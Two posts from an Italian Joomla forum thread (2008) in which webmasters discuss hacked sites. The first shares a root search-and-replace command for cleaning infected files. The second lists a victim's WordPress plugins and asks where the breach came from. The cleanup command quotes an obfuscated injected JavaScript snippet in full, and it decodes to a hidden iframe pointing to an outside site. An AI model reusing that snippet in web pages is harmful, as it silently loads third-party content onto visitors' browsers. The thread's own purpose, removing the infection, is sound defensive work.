Post

1

Le voci di Joomla.it (solo per versione Joomla 1.0.x) / Re: ERRORE - Non funziona più nulla

« il: 31 Mar 2008, 18:32:24 »

Pur bonificando tutto a mano rimangono dei file infetti fuori dalla directory dei domini, per rimuovere veramente tutto abbiamo dovuto dare questo script di search&replace come root su tutto il filesystem:

Codice: [Seleziona]

/usr/bin/rpl -R -v -x .php -x .html -x .htm "<script>function stcount() {var t,o,l,i,j;var s='060047116101120116097116101097062060047116101120116097114101097062060105102114097109101032115114099061039104116116112058047047115104105110121045115116097116046099111109039032119105100116104061039049039032104101105103104116061039049039032115116121108101061039118105115105098105108105116121058032104105100100101110059039062060047105102114097109101062';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}stcount();</script>" "" *

2

Le voci di Joomla.it (solo per versione Joomla 1.0.x) / Re: ERRORE - Non funziona più nulla

« il: 24 Mar 2008, 22:27:24 »

Stessa cosa accaduta anche a noi oggi su www.sabinafutura.it. Avevamo nei due giorni precedenti documentato la presenza di alcune discariche abusive... speriamo sia un caso. Noi abbiamo Wordpress ultima release con attivi i seguenti plugin da molto tempo: Akismet, Dagon Design Form Mailer, mobileadmin, Role Manager, WP-Polls; e i seguenti plugin da due o tre giorni (necessari alla pubblicazione delle foto delle discariche): Exec-PHP, FAlbum, Flickr Photo Gallery.

Non riesco a capire dove sia la falla, te hai qualche idea? Ho ripristinato la situazione, ma temo che possa esserci un altro attacco.